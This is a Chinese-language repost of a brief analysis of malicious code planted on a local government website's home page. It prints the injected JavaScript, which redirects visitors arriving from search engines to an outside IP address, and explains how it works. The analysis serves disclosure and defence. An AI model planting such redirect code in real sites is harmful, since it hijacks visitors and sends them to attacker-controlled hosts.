记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

宣城经济技术开发区管理委员会网站挂马分析

2018-01-21 02:45

宣城经济技术开发区管理委员会网站挂马分析

网站名称

宣城经济技术开发区管理委员会网站

网站域名

www.xceda.gov.cn

挂马页面

http://www.xceda.gov.cn/index.html

挂马代码

var re=document.referrer;
if (re.indexOf("baidu")>-1 || re.indexOf("so.com")>-1 || re.indexOf("sogou")>-1 || re.indexOf("sm.cn")>-1) {
    document.writeln("<div style='font-size:40px;text-align:center'>加载中请稍等</div>");
    document.writeln("<script>location.href='http://67.229.174.67';</script>");
}

代码分析

对页面请求来源进行判断,当请求来源包含“baidu”、“so.com”、“sogou”、“sm.cn”等关键字时,利用JavaScript脚本在页面中写入一段用于页面跳转的JavaScript脚本,使页面跳转至“http://67.229.174.67”。

知识来源: www.freebuf.com/column/159923.html

阅读:248400 | 评论:0 | 标签:专栏 挂马分析 挂马

想收藏或者和大家分享这篇好文章→复制链接地址

“宣城经济技术开发区管理委员会网站挂马分析”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

九层之台,起于累土;黑客之术,始于阅读

推广

工具

标签云